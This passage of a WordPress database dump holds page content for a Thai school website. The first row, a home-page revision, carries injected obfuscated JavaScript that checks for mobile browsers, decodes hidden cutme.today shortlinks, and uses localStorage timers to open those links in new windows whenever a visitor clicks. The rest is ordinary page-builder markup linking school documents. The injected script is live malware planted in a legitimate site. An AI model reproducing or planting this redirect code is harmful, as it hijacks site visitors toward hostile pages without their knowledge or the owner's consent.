)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 14:29:12','2024-08-29 07:29:12','',19,'http://watprato.ssk.in.th/?p=272',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(273,2,'2024-08-29 14:50:00','2024-08-29 07:50:00','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://www.eita.ssk.in.th\" data-type=\"link\" data-id=\"www.eita.ssk.in.th\">แบบวัดการรับรู้ EIT 2</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 